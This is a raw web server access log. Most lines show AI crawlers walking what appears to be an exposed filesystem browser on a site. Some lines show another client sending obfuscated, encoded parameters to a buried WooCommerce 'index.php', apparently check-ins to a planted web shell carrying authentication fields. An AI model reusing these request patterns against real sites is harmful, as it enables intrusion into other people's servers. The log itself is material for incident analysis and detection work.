216.73.216.122 - - [02/Aug/2026:02:14:44 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-128%2Falign&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-128 HTTP/1.1" 200 2733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:45 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory0/uevent&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory0 HTTP/1.1" 200 2823 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:47 +0200] "GET /?fileloc=%2F%2Fbin%2Fbzexe&path=%2F%2Fbin HTTP/1.1" 200 4790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:48 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory6/uevent&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory6 HTTP/1.1" 200 2824 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:50 +0200] "GET /?fileloc=%2F%2Fbin%2Fcpan&path=%2F%2Fbin HTTP/1.1" 200 6374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:02:12:30 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333135302p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393535302q6438363438396636313831373334303733633430373466333861306562383331222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:14:51 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory6/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:53 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fdnssec-verify&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 11447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:54 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory7 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:56 +0200] "GET /?fileloc=%2F%2Fbin%2Fmkfifo&path=%2F%2Fbin HTTP/1.1" 200 16934 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:57 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory6 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory8/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:59 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fscsi_temperature&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 3145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory1 HTTP/1.1" 200 3551 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:02 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-16%2Ftrace&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-16 HTTP/1.1" 200 2733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:04 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory9 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:05 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fxfrm_dst_cache%2Fshrink&path=%2F%2Fsys%2Fkernel%2Fslab%2Fxfrm_dst_cache HTTP/1.1" 200 2731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:07 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory9 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory7/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:08 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-4k%2Fremote_node_defrag_ratio&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-4k HTTP/1.1" 200 2746 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:10 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory6/subsystem/devices/memory9 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory6/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:11 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Ftrial3&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 2853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:02:12:52 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333137322p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393537322q3832623164343335346462373962626263626336373866616163353231333730222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:15:13 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory1/subsystem/devices/memory8 HTTP/1.1" 200 3547 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory1/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:14 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fntfscluster&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 13922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:16 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory9 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory8/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:18 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-10-2k%2Fobject_size&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-10-2k HTTP/1.1" 200 2740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:19 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory0/subsystem/devices/memory8 HTTP/1.1" 200 3551 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory0/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:20 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fip_fib_trie%2Fvalidate&path=%2F%2Fsys%2Fkernel%2Fslab%2Fip_fib_trie HTTP/1.1" 200 2731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:22 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory9 HTTP/1.1" 200 3548 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:23 +0200] "GET /?fileloc=%2F%2Fsbin%2Fexiwhat&path=%2F%2Fsbin HTTP/1.1" 200 4904 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:26 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory3 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:26 +0200] "GET /?fileloc=%2F%2Fproc%2F28%2Fwchan&path=%2F%2Fproc%2F28 HTTP/1.1" 200 2707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:29 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory7/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:29 +0200] "GET /?fileloc=%2F%2Fbin%2Fua&path=%2F%2Fbin HTTP/1.1" 200 3167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:32 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory6/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:32 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-03-64%2Fhwcache_align&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-03-64 HTTP/1.1" 200 2740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:02:15:35 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-07-128%2Fslabs_cpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-07-128 HTTP/1.1" 200 2743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:02:13:14 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333139342p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393539342q3235393063373034626332666164653364323039666336343834663334663936222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:15:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem/devices/memory9 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:38 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fuser_event_enabler_fault%2Ftotal_objects&path=%2F%2Fsys%2Fkernel%2Fslab%2Fuser_event_enabler_fault HTTP/1.1" 200 2745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:39 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory9/valid_zones&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory9 HTTP/1.1" 200 2834 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:41 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fxfrm_state%2Ftrace&path=%2F%2Fsys%2Fkernel%2Fslab%2Fxfrm_state HTTP/1.1" 200 2729 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:42 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory9/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:44 +0200] "GET /?fileloc=%2F%2Fproc%2F778%2Foom_score&path=%2F%2Fproc%2F778 HTTP/1.1" 200 2714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:45 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory1 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:47 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fio_kiocb%2Falign&path=%2F%2Fsys%2Fkernel%2Fslab%2Fio_kiocb HTTP/1.1" 200 2726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:48 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory2 HTTP/1.1" 200 3546 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:50 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-2k%2Freclaim_account&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-2k HTTP/1.1" 200 2740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:51 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory9/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:53 +0200] "GET /?fileloc=%2F%2Flib%2Fphp%2F20230831%2Fgettext.so&path=%2F%2Flib%2Fphp%2F20230831 HTTP/1.1" 200 6592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:55 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory3 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:15:56 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-10-2k%2Falign&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-10-2k HTTP/1.1" 200 2735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:15:58 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory9 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory8/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:02:13:37 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333231372p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393631372q3637623636303131666137343531386339323066613036633061663762323230222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:02:15:59 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-04-128%2Fusersize&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-04-128 HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:16:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory3/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:16:02 +0200] "GET /?fileloc=%2F%2Fproc%2F72%2Fcpuset&path=%2F%2Fproc%2F72 HTTP/1.1" 200 2707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:16:04 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory6/subsystem/devices/memory9 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory6/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:16:05 +0200] "GET /?fileloc=%2F%2Fproc%2F73%2Fwchan&path=%2F%2Fproc%2F73 HTTP/1.1" 200 2708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:16:07 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory6 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory7/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
